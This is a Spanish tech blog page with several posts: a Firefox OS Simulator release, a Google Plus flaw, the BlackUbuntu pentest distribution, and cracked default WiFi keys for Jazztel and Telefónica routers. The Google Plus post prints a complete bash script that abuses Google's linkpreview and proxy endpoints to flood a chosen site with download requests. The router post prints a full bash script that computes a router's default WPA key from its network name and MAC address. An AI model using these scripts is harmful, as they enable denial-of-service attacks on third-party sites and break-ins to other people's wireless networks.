Categoría: Noticias

Publicado el

Descarga Firefox OS Simulator 3

Desde la Fundación Mozilla han anunciado que finalmente ya se encuentra disponible la versión final de Firefox OS Simulator 3.0, una aplicación que nos permite evaluar cómo funciona esta plataforma en PCs y portátiles que utilizan Linux, Windows o Mac OS.

FirefoxOS.2-520x245
En esta nueva versión se incluyen algunas funcionalidades extra como el soporte para la rotación y la geolocalización.

Entre las novedades de Firefox OS Simulator 3.0 destacan la posibilidad de enviar a un teléfono físico la aplicación que estemos desarrollando mediante conexión USB, con la opción “Push to Device”. También incorpora versiones actualizadas del motor de renderizado y las bibliotecas de la interfaz usuario Gaia (la nueva interfaz de Firefox OS) así como atajos para volver a instalar o reiniciar aplicaciones.

El tamaño del simulador es ahora más pequeño, por lo que, tanto descarga como inicio de la aplicación es más rápido.

Por último, cabe mencionar que la documentación de instalación también mejora significativamente.

Para instalar Firefox OS Simulator 3.0 deberemos agregar un complemento al navegador web Firefox, siendo éste un requisito para poder utilizar el simulador. Luego, será cuestión de lanzar el simulador junto con todas las herramientas para desarrolladores que la Fundación Mozilla está ofreciendo actualmente para facilitar el trabajo de los programadores.

Descargar Firefox OS Simulator 3

Publicado el

Fallo de seguridad en los servidores de Google Plus

Google Plus

Google Plus

Un nuevo agujero de seguridad ha sido descubierto en los servidores de Google plus que permite a los hackers hacer un ataque DDoS usando el ancho de banda de Google.

Google plus ha sido objeto de pruebas desde ya hace un tiempo y una de las personas encargadas de estas pruebas (de una empresa de seguridad italiana) ha informado de que los servidores de Google plus se pueden utilizar para hacer solicitudes DDos a otros sitios web.

La noticia original de este informe se puede ver en IHTeam un blog de seguridad propiedad de Simone Quatrini. Él demuestra cómo los usuarios pueden hacer uso del servidor de Google para actuar como un proxy y buscar el contenido de cualquier sitio web que desee. También se observa que los servidores de Google son más anónimos que los demás servidores.

Ha mencionado dos métodos, uno que utiliza / _ / sharebox / linkpreview /. Este método no expone su dirección IP para conectarse a los servidores Apache. Pero el otro método, gadgets / proxy? Parece que si que se expone la dirección IP a los servidores.

El equipo también ha publicado un script para shell de linux que permite ejecutar la vulnerabilidad. El script hace una solicitud a los servidores de Google para hacer una petición a una página web. Lo importante del tema es que se utiliza el ancho de banda de Google en lugar del atancante.

Según comenta el autor, hayo otros métodos para atacar de manera más segura, pero lógicamente no los quiere exponer en la red.

Resumiendo, se puede hacer y descargar senzilla y rápidamente cualquier tipo de archivo a través de los servidores de Google haciendo un DDoS.

Mas abajo teneis el video explicativo y el script en bash que usa en el video Simone Quatrini 😀

Fuente | IHTeam

In this example i start a thread of 1000 requests and the output bandwidth will result in 91/96Mbps (my house bandwidth is only 6Mbps). This is my server, do not start to ddos around for no reason!

+DDoS source code download:

http://www.ihteam.net/advisories/_154785695367_+ddos.sh

#!/bin/bash

#   Bug found by                        #
#       Simone 'R00T_ATI' Quatrini      #
#       Mauro 'epicfail' Gasperini      #
#       Site: http://www.ihteam.net     #

function start {
    echo "[*] Sending `echo $2` Requests..."

    for a in `seq $2`
    do
        id=$((RANDOM%3999999+3000000))
        nohup curl "https://plus.google.com/_/sharebox/linkpreview/?c=$url&t=1&_reqid=$id&rt=j" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
        nohup curl "https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=$urlclear&container=focus" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
    done

    echo "[*] Still attacking `echo $urlclear`"
    echo "[*] Sleeping for 10 Seconds"
    sleep 10
    start url $2 urlclear
}

echo ''
echo '             88888888ba,    88888888ba,                  ad88888ba  '
echo '    aa      88      `"8b   88      `"8b                d8"     "8b  '
echo '    88      88        `8b  88        `8b               Y8,          '
echo 'aaaa88aaaa  88         88  88         88   ,adPPYba,   `Y8aaaaa,    '
echo '""""88""""  88         88  88         88  a8"     "8a    `"""""8b,  '
echo '    88      88         8P  88         8P  8b       d8          `8b  '
echo '    ""      88      .a8P   88      .a8P   "8a,   ,a8"  Y8a     a8P  '
echo '            88888888Y""    88888888Y""     `"YbbdP""    "Y88888P"'
echo ''

if [ "$#" -lt 2 ]; then
    echo "Usage: $0 <big file> <Requests>"
    echo "Example: $0 http://www.site.com/very_big_file.tar.gz 1000"
    echo ""

    exit 0
fi

case $2 in
    *[!0-9]* )  echo "$2 is not numeric" && exit 1;;
esac

echo "Attack -->" $1
match1=/
repl1=%2F
match2=:
repl2=%3A
url=$1
urlclear=$1

url=${url//$match1/$repl1}
url=${url//$match2/$repl2}

echo ""
echo "[*] Loop started! CTRL+C to stop"
echo ""

start url $2 urlclear
Publicado el

BlackUbuntu – La nueva distribución «para pruebas de seguridad» basada en Ubuntu

Blackbuntu es la distribución de pruebas de penetración, que fue diseñado especialmente para estudiantes de formación en seguridad y profesionales de seguridad de la información. Blackbuntu distro Ubuntu es la base de pruebas de penetración de seguridad con entorno de escritorio GNOME. Es en la actualidad se está construyendo con el Ubuntu 10.10 y de trabajo en la referencia posterior.

Blackubuntu

Blackbuntu features the following upstream components:

Ubuntu 10.10, Linux 2.6.35 and Gnome 2.32.0 System requirements

* 1GHz x86 processor

*768 MB of system memory (RAM)

* 10 GB of disk space for installation

* Graphics card capable of 800×600 resolution

* DVD-ROM drive or USB port

Blackubuntu

BlackUbuntu os la podeis descargar desde el siguiente link
http://sourceforge.net/projects/blackbuntu/files/Community%20Edition/Community%20Edition%200.2/bbuntu-ce-0.2.iso/download

Una breve video review de BlackUbuntu

Publicado el

Algoritmo descifrado de los routers wifi de Jazztel y Teléfonica

Los usuarios de jazztel y  Telefonica movistar que no hayan cambiado el nombre (ESSID) de sus wifis pueden ir pensando en hacerlo: El algoritmo ha sido descifrado. Por lo visto, el que sacó a la luz el algoritmo fue elvecinoo en este hilo de lampiweb En http://kz.ath.cx/wlan/ (Entre otros) se ingresa nombre y la MAC del router y te la clava.

A mi me gusta más la versión en Bash:

#!/bin/bash

echo CalcWLAN by a.s.r

if [ $# -ne 2 ]
then
echo "Usage: $0  "
echo
echo "Example: $0 WLAN_C58D 64:68:0C:C5:C5:90"
exit 1
fi

HEAD=$(echo -n "$1" | tr 'a-z' 'A-Z' | cut -d_ -f2)
BSSID=$(echo -n "$2" | tr 'a-z' 'A-Z' | tr -d :)
BSSIDP=$(echo -n "$BSSID" | cut -c-8)
KEY=$(echo -n bcgbghgg$BSSIDP$HEAD$BSSID | md5sum | cut -c-20)

echo "La puta clave es $KEY"

Teneis un mirror para generar la clave online aqui mismo:
https://blogofsysadmins.com/generador-de-claves-wifi-para-jazztel_xxxx-y-wlan_xxxx

Mas información:

http://www.hispasec.com/unaaldia/4487

http://elvecinoo.wordpress.com/